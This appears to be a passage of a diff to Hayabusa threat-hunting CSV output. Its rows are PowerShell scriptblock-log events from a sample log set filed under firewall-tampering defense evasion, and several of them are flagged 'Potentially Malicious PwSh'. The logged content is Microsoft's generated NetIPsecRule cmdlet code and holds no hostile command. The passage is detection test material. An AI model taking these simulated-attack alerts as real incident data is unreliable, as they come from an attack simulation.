[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 